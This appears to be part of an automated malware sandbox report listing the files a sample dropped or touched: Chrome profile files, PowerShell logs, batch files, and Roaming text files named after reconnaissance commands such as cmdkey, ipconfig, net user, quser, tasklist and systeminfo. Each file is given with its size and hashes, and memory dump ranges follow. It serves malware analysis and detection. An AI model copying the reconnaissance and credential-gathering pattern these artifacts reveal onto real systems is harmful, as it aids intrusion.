SHA256
61df38b8867d038b519d0dfa3796c787f436b54e54156c6ba1da9554d5399be1

SHA512
b141653b5621a6196731d112150c38127c891db57b33bcccb2be5dd858fa7b2b761249611a06d1c1c8c07082957efb7a901170641a8972dff0ce1e7e032c7be4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a35cbd168bc29a401374e64f9e300e1f

SHA1
231b01476cddf2d8ae3d0debda64dda1a06e5371

SHA256
4bb51aaf5da80904e970718c2d604990ba0e274db54748fde5a51e967f0fc1ca

SHA512
87b9f06ab90329774d5baaf08aea62973c337ef991713bc1a638b6c53c4a7fa2d7f47b93825a6f0cdd5611711c9507e4a00a2bced1f5e973a2a248ef5ea29897

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
0b28ab29a61f73f0122a980c38808d50

SHA1
5f017b09e55e0636055abc6dafc69a2fdd780683

SHA256
5408480f6f76aa924e2ab58e43fbf5ee663e8d5173e44e623e7517058f2a2574

SHA512
d26573138dc21b830c23ad75d7901dc88dd3c4223db418d2860b83490e0daf4dc6627b589be6c0d4535ad36197abd199cb132615e230ecad8525c27c88bb8c46

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
7de70435e131cc05104cc37ca3de4c11

SHA1
9e05dd368029a22a96080b26ff2ac3ed40feb3e9

SHA256
b6d816ad1679bf67fe80f7c7237f604edd700c89496a5e85abfe2ec344ff5314

SHA512
5274b9eddcf0925d141b044dda2d0759dab00ae8d6335a1c0af262ad97316381333ef5ee625d848ea53931e43b84f29d46db6d4a6bc162c5d566de73e8662a52

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a113889dc808de7cd6d096a03551466f

SHA1
2f725aeb4c24d4bf2ee9a1f7e96250bf951ebd17

SHA256
e925fbe698889983b0bd5c6d96e8702a663bb05cae3465dc5889840af918e017

SHA512
4480dd7ef68049687a8b6c82749c5da0d8c43297bc399df00f53625c5c6484f09cb1f72adb1324e420fc5d09b1fe16527943c74491e0eedfa006e1ac0e8ebc6b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
6e79afb8c43e7d36030586180b793a0b

SHA1
c0bebb4386b5bb70687fbec2858627722638fb5b

SHA256
558278eb06ac5a136805fcaeba460986f97202ebabd3b3d33667ac58ddb3184e

SHA512
b597468f21f36bc7ef344a4a585447a10cbf7fbdf3006398eb08bc9dfc01b3550096c6492103a4a80596ccdbb048b678d190d4e2caad6da649f4cf039566375e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
a6e861d65e91cc166a67615e096ad574

SHA1
2be2a1674c92a7585081579e6fb624f33c4ac813

SHA256
63848735cea8c9f37f07bc3e85213c1382263f6046cbeed152265bd26de4b86a

SHA512
6d54204aaf0e5b79c8f21a86388df8ed835def6ca6504f9114e3f87eeddea49b9c5537eafae940d80d253577541e3e5354bd6912a5f50f2affd46cc770a23af7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
64e1b4e1b42a099a00986198406f57eb

SHA1
92d6943a3f8e44040a1e3d1e4cdfa2b36c383810

SHA256
7c110dcb81b8c48f0d6fbab917dae3afa99bd00be3e41ac709a75ff96fb246ca

SHA512
f0216605441bb48fb253aa6aac9a6a1ef274705cf8e1081b64974d40b641b1937ad0ba4c5b3bed09643548e7a92316fe7371d17473a9fb613b5d148a2e19b610

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
85ee9a8bb1561f858b47a8f59bf180a6

SHA1
051ace824afa23515d76ce63519e7a388398fc0c

SHA256
a7f1b145454959b393e9abe01a1371f6285fb2e0827c4a6456294d7f7df6a282

SHA512
b47a97edf5292e704c6e00ed1018a0c3b2068e7876efd69e37e64e095f250f1cc40e6a1eed9a5ddb5f229bbccbec00b26b9380842f4c54861a174dc6e943dc87

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
51dffda5883e7acacf91ec810aafafa7

SHA1
37cc598d01a5a0ff32c3ab6b203af5866d2994e8

SHA256
ac91d219078f28ef0c04ad7d1ae2e5cc137d4ab83970c49434f865c8aa427a83

SHA512
f266c56f324df195af669e0827cd377c07dbaecef87536ac192632c364432030c0be77b3cb0f6a1cbc695e406810389a7459836844f1668aa03e1339865320ec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5e95d4688b11d2836ad0f3a548e4fc46

SHA1
60ebc1c51d612451026ab9984356cbe0b748a8f0

SHA256
2f09b209996505992dc5a3b7e02abb1e31f3aafc5486acf3e1fc74fed60804d6

SHA512
e161f422496aa7951f1a133559f1a7be1c4606cfd69fc883427c86f66913d8d659c3fae224b207c9cc3ef4ff676b828e425c780ceb9e7ee9c2a7c5dea817b4d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
6a872ccaf4b0d3471fd1a1d10a47e48a

SHA1
7d16c1974b8c7ca128dcfefbc05a52436f0cf69c

SHA256
7651c7229217c0d1d53e6b6b87d89bf2342b4f7e6f2c4c44b7fdac09dd009788

SHA512
887077152c1065f14d9bf2d2d272a119119d4b48be1faa7c339b38ed424b0619eba298e5f7033cfbcda2c12b0e692030e16ca3e3a8b7920a1f0747c93768367c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
febe6a9006c2214ae8315dc94b4a7226

SHA1
e6a3bcb9a2820ef61865900b87c22a7b68b2adf4

SHA256
80962217b1acacd5bd67e464472f6666ef2e0ec2c78afa5999eb03a975db17f8

SHA512
d3a676c91d05d033a43c838abf92d2a35960b0a2c9a933a4b8ebb5c48943ed67710a2924771c28ff80ce8f935e2fcc938d731e610b4a06452296535bbd1d849d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
4713964d46dc28b1caa95457784c20e3

SHA1
c42ee89f8fb40b303030a62cdf4387778ea0b670

SHA256
cb4e08a1e4ca4b4015645b82fd5f1a9b47584ac5cc0bb8f848f8b137351e4570

SHA512
7e17fae19e569f9f835684e140c24ba9128b2614c2aacf55d9147d4fda41f4897ed3a5d2ad2a8c2681994d68ef0407b56c23e171bbd5ffe5b0832eac082aa76e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
181KB

MD5
2034ca33313240fbd3e9fce8e3b6c420

SHA1
bb9fb5e2cefa46567ec3525bc01d488d938e7762

SHA256
8b9682e63371ec224d1a3a551f45c4c3f51c8680af671e20f889664443d19a8f

SHA512
c4b8d090111f1fcc0a09f0f9054e9f56846e3b6800c622c46aabf0c45cf4282c5220231e21712fe55a8d96d87c621b8d6d69e9ddd6bd687ea41879a20c8d5359

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
181KB

MD5
bc3c69fa7be7cf9da2aaaf17c63e9a9a

SHA1
953f92021c74c4883705e8fff1fa98a9a0d5ce8b

SHA256
32956cd44f903618abe04002320f3e5eefa1c16b368d5218b2f0c193c21df80b

SHA512
8d3bbaef3588dedac7bee18c511913ede8e80d466db201d56d21c683072cf69d36e14a02d7a023cded99bd3ad7306765f53e41b748b6307df972b3abd94ff89b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
181KB

MD5
ff3c9747932687f1357c380a0a7e6094

SHA1
740b420e081b2b0b30e377bb603293e99e4629dc

SHA256
db774bf9ce6abc945a35d9acc1e536aba347b0f9012077c9c2a7b445c5299208

SHA512
e1f709d4f1ec805b11ad95aee07498d520ce74741e051c89117fdf2f30d30d0da7a02168563ccbc52dffccdde73d7bc8551f53bb1913d3708327c219e85c7de8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
feadc4e1a70c13480ef147aca0c47bc0

SHA1
d7a5084c93842a290b24dacec0cd3904c2266819

SHA256
5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

SHA512
c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.bat

Filesize
12KB

MD5
a1f7f564f26610766965b7abf4eed00e

SHA1
efc0a15e2504a905c4f6f61031749cf60178594c

SHA256
5a315584a287847b33eabac883b0273a588d1a77a363b3981cb668715450ebd8

SHA512
47ba875ec712988d2c067c05df28be3b45cdf6612b4904ab7152a1b4d8c8a5fca24cf297c8bb00c00c23bb4bce60f682f4e7e4652fc8b8551482870a7b7160c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cpimx4au.efq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\cmdkey.txt

Filesize
309B

MD5
5723dad3538f96507a00fa4438c8cde4

SHA1
29810385cd0bd54ab0b0e5a66577067a16edd37e

SHA256
ff248edd50b90e4a1adc6187dbd8b7e5c040040b60fd1f08c084c40e0c3dda1e

SHA512
06a3c51a77b8535f2749a6482bd425b29807d6fac1e27f6c85b40b30311e4e9c312f55ee67f9f40c7cba03684d4dae64b041d105a7d29bc1d919f65dbae00401

Download Submit
C:\Users\Admin\AppData\Roaming\ipconfig.txt

Filesize
1022B

MD5
e2d026e112eef9a0d2d941c0419921c1

SHA1
b42eb60f8682d7c51ec4c9b09c92e300ae16268a

SHA256
3313fe10632151e001a7050c3e996bd86d57bdc35af23b3789e0eb0ada40567b

SHA512
c27067e2985113dc7d6fadc93f625490824e2d5c07d1c5439dc6981a46e25fc4ab9a029a0402367bfd662de2da7bb8ab81675a6a9596500bc633b86b6234fb9d

Download Submit
C:\Users\Admin\AppData\Roaming\netuser.txt

Filesize
283B

MD5
b48d383753dab85fe369631e6d8331a1

SHA1
64db6fe8d35c25b3da65c98a95aa885d7560b459

SHA256
90a96795e61e92d6fa4f2876138df78cc0c28122d3af19bcd81d93aa0215accb

SHA512
9788aee48f0204b63b38e1d97ae80e08e74cc9254ead00dadf3b88ae7a7b74fbb4f154c7cf38158063c4eb5de128129219e0fe4ddedb9718767c1159a763da95

Download Submit
C:\Users\Admin\AppData\Roaming\quser.txt

Filesize
160B

MD5
7abdb2aaeb7a6dbea6cf1af031cbca28

SHA1
19da55f5879aabfb92627f457f0026d906f68e4c

SHA256
d417320094e6f8034ce6d1285ee702a9a8d7f99a337033a84fac94bebf2cb689

SHA512
30b25f7d63db806df4fd3e3912c3a432857d4c8b433b21e6e64e2a32602c29c2009d24995fface93b29aeba99728b98c8cd86626089ba03e58d483f957224158

Download Submit
C:\Users\Admin\AppData\Roaming\stup.txt

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Users\Admin\AppData\Roaming\sysinfo.txt

Filesize
2KB

MD5
5728f6bd408abe2ab0a629b4f58f50c1

SHA1
afe53d0e9923b9d59225470c2641eced99d3a773

SHA256
69b929aaaaf97e1224736f8c8a1ff35bf98c4671f2b68bf36bc9192657701180

SHA512
e4af0afff7c4f18239b5f61f583a032fc40f311f195ac8fa51967d1cf3f4c43e5e859ba74fc24782f9770d6ddec406ecc11bd20bae324a848d221526471d1915

Download Submit
C:\Users\Admin\AppData\Roaming\tasklist.txt

Filesize
7KB

MD5
e75e1fd1cdb657d1f1786c577fc5c44b

SHA1
b4e264d76fd984f36397cb4e0470d924f57c00e4

SHA256
1bcfa4607ef8502ae13ca5ef4f749b8b0d6b3e4641b98b69e37f4b347c0cdcc0

SHA512
36a334a3011971e4fa009a34794f49b3fb8c7d9c115def0f20a0955a5f52e022d9f3813098cca67cd919ab6de1478852753189b22cd997cbb3c2b805090f77a7

Download Submit
C:\Users\Admin\Downloads\BSBuilder.zip.crdownload

Filesize
22KB

MD5
26dd242375671579976e5839aca7ab51

SHA1
f86be004e5c381323e641c1d595f25e64a5aa0db

SHA256
8af4d595729b7a5e668b70bf3df7f23025e6bb2b1a8d06d8879323366e7c7f9b

SHA512
83dd11b45737a055774c9ec57294d49f87075feb7c9a229295c4b4ed453f5793cbc9170acecf6ce8c432b101ac65604e65c949667daeda33af121862e0e39005

Download Submit
C:\Users\Admin\Downloads\BSBuilder\output.bat

Filesize
34KB

MD5
e5f18b9b3e68f4c2f3bffb39721d252a

SHA1
f04d0d163cb40d02724f469ac01f9de9da859dbc

SHA256
887dd37c0d1045a4307fa021e82da1a8bc2d538a0d35f6f3a8e97a9c4e830d7d

SHA512
78768db23333d7b2127ed9888589996809f97fc4cd55677ee39904aece93c6f547d7e4aa3f5bcf9b67e2c22e1253eda7bbacb48914ad2de9109820bfc9852a22

Download Submit
memory/3452-297-0x0000000000790000-0x00000000007A6000-memory.dmp

Filesize
88KB

Download
memory/3452-298-0x0000000005650000-0x0000000005BF4000-memory.dmp

Filesize
5.6MB

Download
memory/3452-299-0x00000000050A0000-0x0000000005132000-memory.dmp

Filesize
584KB

Download
memory/3452-300-0x0000000005360000-0x000000000536A000-memory.dmp

Filesize
40KB

Download
memory/3456-429-0x000001D785560000-0x000001D785582000-memory.dmp

Filesize
136KB

Download
memory/5664-443-0x0000019CE9580000-0x0000019CE9742000-memory.dmp

Filesize
1.8MB

Download